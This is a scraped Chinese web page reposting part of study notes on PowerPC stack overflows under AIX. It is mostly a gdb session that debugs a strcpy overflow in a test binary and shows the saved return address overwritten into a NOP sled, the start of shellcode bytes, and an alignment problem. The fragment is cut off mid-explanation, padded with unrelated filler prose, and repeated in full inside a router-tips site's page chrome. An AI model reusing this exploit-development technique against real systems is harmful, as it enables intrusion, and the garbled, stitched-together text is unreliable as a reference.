AIX PowerPC体系结构及其溢出技术学习笔记

grep vul
san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul
san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix5.1.0.0"...
Attaching to program: /home/san/vulnerable, process 44544
0xd01ea254 in read () from /usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for function main:
0x10000544 <main+0>: mflr r0
0x10000548 <main+4>: stw r31,-4(r1)
0x1000054c <main+8>: stw r0,8(r1)
0x10000550 <main+12>: stwu r1,-88(r1)
0x10000554 <main+16>: mr r31,r1
0x10000558 <main+20>: stw r3,112(r31)
0x1000055c <main+24>: stw r4,116(r31)
0x10000560 <main+28>: lwz r9,116(r31)
0x10000564 <main+32>: addi r9,r9,4
0x10000568 <main+36>: addi r3,r31,56
0x1000056c <main+40>: lwz r4,0(r9)
0x10000570 <main+44>: bl 0x10007000 <strcpy>
0x10000574 <main+48>: nop
0x10000578 <main+52>: lwz r3,88(r2)
0x1000057c <main+56>: addi r4,r31,56
0x10000580 <main+60>: bl 0x100073ec <printf>
0x10000584 <main+64>: lwz r2,20(r1)
0x10000588 <main+68>: lwz r11,92(r2)
0x1000058c <main+72>: lwz r9,92(r2)
0x10000590 <main+76>: lwz r9,4(r9)
0x10000594 <main+80>: addi r0,r9,-1
0x10000598 <main+84>: stw r0,4(r11)
0x1000059c <main+88>: cmpwi r0,0
0x100005a0 <main+92>: bge- 0x100005b4 <main+112>
0x100005a4 <main+96>: lwz r3,92(r2)
0x100005a8 <main+100>: bl 0x1000747c <__filbuf>
0x100005ac <main+104>: lwz r2,20(r1)
0x100005b0 <main+108>: b 0x100005c8 <main+132>
0x100005b4 <main+112>: lwz r11,92(r2)
0x100005b8 <main+116>: lwz r9,92(r2)
0x100005bc <main+120>: lwz r9,0(r9)
0x100005c0 <main+124>: addi r0,r9,1
0x100005c4 <main+128>: stw r0,0(r11)
0x100005c8 <main+132>: mr r3,r0
0x100005cc <main+136>: lwz r1,0(r1)
0x100005d0 <main+140>: lwz r0,8(r1)
0x100005d4 <main+144>: mtlr r0
0x100005d8 <main+148>: lwz r31,-4(r1)
0x100005dc <main+152>: blr
0x100005e0 <main+156>: .long 0x0
0x100005e4 <main+160>: .long 0x2061
0x100005e8 <main+164>: lwz r0,513(r1)
---Type <return> to continue, or q <return> to quit---
0x100005ec <main+168>: .long 0x0
0x100005f0 <main+172>: .long 0x9c
0x100005f4 <main+176>: .long 0x46d61
0x100005f8 <main+180>: xori r14,r11,7936
End of assembler dump.
(gdb) b *0x100005dc
Breakpoint 1 at 0x100005dc
(gdb) c
Continuing.在执行exploit.pl的窗口随便敲个键，gdb调试窗口就可以继续了：Breakpoint 1, 0x100005dc in main ()
(gdb) i reg
r0 0x100001cc 268435916
r1 0x2ff22210 804397584
r2 0x20000ee8 536874728
r3 0xf00890f1 -267874063
r4 0xf00890f0 -267874064
r5 0x0 0
r6 0xd032 53298
r7 0x0 0
r8 0x60000000 1610612736
r9 0x60002449 1610622025
r10 0x0 0
r11 0x600026c8 1610622664
r12 0x100005ac 268436908
r13 0xdeadbeef -559038737
r14 0x2 2
r15 0x2ff22264 804397668
r16 0x2ff22270 804397680
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000520 536872224
r29 0x10000000 268435456
r30 0x3 3
r31 0x2ff22b40 804399936
pc 0x100005dc 268436956
ps 0x2d032 184370
cnd 0x24222422 606217250
lr 0x100001cc 268435916
cnt 0x0 0
xer 0x0 0
mq 0x0 0
fpscr 0x0 0
(gdb) x/20x $r1
(gdb) x/20x $r1
0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c
0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22250: 0x00000000 0x00000000 0x00000000 0x2ff22270
(gdb) x/20x 0x2ff22b40
0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060
...
...
...
(gdb)
0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f我们看到lr寄存器正好被覆盖为0x2ff22b40，这就说明程序的流程能达到0x2ff22b40，这个地址也都是填充的nop指令，由于AIX PowerPC是4字节的等长指令，注意到0x2ff22f34这个地址错了两个字节，这肯定导致shellcode无法正常执行。watercloud有一个很好的方法解决这个指令字节对齐的问题

网络的神奇作用吸引着越来越多的用户加入其中，正因如此，网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......，各项技术都需要适时应势，对应发展，这正是网络迅速走向进步的催化剂。

关键词：AIX PowerPC体系结构及其溢出技术学习笔记

争怎路由网：是一个主要分享无线路由器安装设置经验的网站，汇总WiFi常见问题的解决方法。争怎路由网出厂设置 wifi名称上网参数配置小米上不了网网站首页不能上网路由器密码 WiFi设置路由器设置 TP-Link 腾达路由器软件教程游戏教程系统下载您当前所在位置：下载首页 -> 杀毒教程
AIX PowerPC体系结构及其溢出技术学习笔记时间：2024/4/21作者：未知来源：争怎路由网人气： grep vul san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera -bash-2.05b$ gdb vulnerable 44544 GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... Attaching to program: /home/san/vulnerable, process 44544 0xd01ea254 in read () from /usr/lib/libc.a(shr.o) (gdb) disas main Dump of assembler code for function main: 0x10000544 <main+0>: mflr r0 0x10000548 <main+4>: stw r31,-4(r1) 0x1000054c <main+8>: stw r0,8(r1) 0x10000550 <main+12>: stwu r1,-88(r1) 0x10000554 <main+16>: mr r31,r1 0x10000558 <main+20>: stw r3,112(r31) 0x1000055c <main+24>: stw r4,116(r31) 0x10000560 <main+28>: lwz r9,116(r31) 0x10000564 <main+32>: addi r9,r9,4 0x10000568 <main+36>: addi r3,r31,56 0x1000056c <main+40>: lwz r4,0(r9) 0x10000570 <main+44>: bl 0x10007000 <strcpy> 0x10000574 <main+48>: nop 0x10000578 <main+52>: lwz r3,88(r2) 0x1000057c <main+56>: addi r4,r31,56 0x10000580 <main+60>: bl 0x100073ec <printf> 0x10000584 <main+64>: lwz r2,20(r1) 0x10000588 <main+68>: lwz r11,92(r2) 0x1000058c <main+72>: lwz r9,92(r2) 0x10000590 <main+76>: lwz r9,4(r9) 0x10000594 <main+80>: addi r0,r9,-1 0x10000598 <main+84>: stw r0,4(r11) 0x1000059c <main+88>: cmpwi r0,0 0x100005a0 <main+92>: bge- 0x100005b4 <main+112> 0x100005a4 <main+96>: lwz r3,92(r2) 0x100005a8 <main+100>: bl 0x1000747c <__filbuf> 0x100005ac <main+104>: lwz r2,20(r1) 0x100005b0 <main+108>: b 0x100005c8 <main+132> 0x100005b4 <main+112>: lwz r11,92(r2) 0x100005b8 <main+116>: lwz r9,92(r2) 0x100005bc <main+120>: lwz r9,0(r9) 0x100005c0 <main+124>: addi r0,r9,1 0x100005c4 <main+128>: stw r0,0(r11) 0x100005c8 <main+132>: mr r3,r0 0x100005cc <main+136>: lwz r1,0(r1) 0x100005d0 <main+140>: lwz r0,8(r1) 0x100005d4 <main+144>: mtlr r0 0x100005d8 <main+148>: lwz r31,-4(r1) 0x100005dc <main+152>: blr 0x100005e0 <main+156>: .long 0x0 0x100005e4 <main+160>: .long 0x2061 0x100005e8 <main+164>: lwz r0,513(r1) ---Type <return> to continue, or q <return> to quit--- 0x100005ec <main+168>: .long 0x0 0x100005f0 <main+172>: .long 0x9c 0x100005f4 <main+176>: .long 0x46d61 0x100005f8 <main+180>: xori r14,r11,7936 End of assembler dump. (gdb) b 0x100005dc Breakpoint 1 at 0x100005dc (gdb) c Continuing.在执行exploit.pl的窗口随便敲个键，gdb调试窗口就可以继续了：Breakpoint 1, 0x100005dc in main () (gdb) i reg r0 0x100001cc 268435916 r1 0x2ff22210 804397584 r2 0x20000ee8 536874728 r3 0xf00890f1 -267874063 r4 0xf00890f0 -267874064 r5 0x0 0 r6 0xd032 53298 r7 0x0 0 r8 0x60000000 1610612736 r9 0x60002449 1610622025 r10 0x0 0 r11 0x600026c8 1610622664 r12 0x100005ac 268436908 r13 0xdeadbeef -559038737 r14 0x2 2 r15 0x2ff22264 804397668 r16 0x2ff22270 804397680 r17 0x0 0 r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000520 536872224 r29 0x10000000 268435456 r30 0x3 3 r31 0x2ff22b40 804399936 pc 0x100005dc 268436956 ps 0x2d032 184370 cnd 0x24222422 606217250 lr 0x100001cc 268435916 cnt 0x0 0 xer 0x0 0 mq 0x0 0 fpscr 0x0 0 (gdb) x/20x $r1 (gdb) x/20x $r1 0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000 0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c 0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22250: 0x00000000 0x00000000 0x00000000 0x2ff22270 (gdb) x/20x 0x2ff22b40 0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060 ... ... ... (gdb) 0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8 0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f我们看到lr寄存器正好被覆盖为0x2ff22b40，这就说明程序的流程能达到0x2ff22b40，这个地址也都是填充的nop指令，由于AIX PowerPC是4字节的等长指令，注意到0x2ff22f34这个地址错了两个字节，这肯定导致shellcode无法正常执行。watercloud有一个很好的方法解决这个指令字节对齐的问题网络的神奇作用吸引着越来越多的用户加入其中，正因如此，网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......，各项技术都需要适时应势，对应发展，这正是网络迅速走向进步的催化剂。关键词：AIX PowerPC体系结构及其溢出技术学习笔记*	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程其它教程技术开发安卓教程 *人气排行* 1局域网内命令大全 2Windows 0day EternalBlue(永恒之蓝... 32017好用的公共DNS推荐 4无线网络连接上但上不了网处理方法 5是怕不给礼金？伴娘太敬业胸挂二维码 6华平终端端口关闭方法设置说明 7WannaCry蠕虫勒索病毒用户处置方法 8新版Windows 10不惧勒索病毒 94川一企业攻克勒索软件？公司称并未破解病毒密码，而是用别的... 10腾讯王卡1元1天宽带活动正式开发办理！ *推荐资讯* 1调出黄褐色抽烟女孩写真照片的PS图文详细教程 2唯品会优惠券如何激活唯品会优惠券如何使用 3Photoshop制作光盘封面 4微信小程序开发animation心跳的动画效果代码案例详细... 5css完成3角形原理剖析及图文详细教程详细说明 6word打字时后面的字消失处理方法 word打字后面的字消... 7横行于Internet 无限你的局域网—VNN 8无法用TCP/IP协议连接远端SQL Server数据库问... 9TP-Link TL-WR882N 无线路由器隐藏WiFi... 10Win7系统遇到开机提示“密码已过时”的问题如何处理
Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版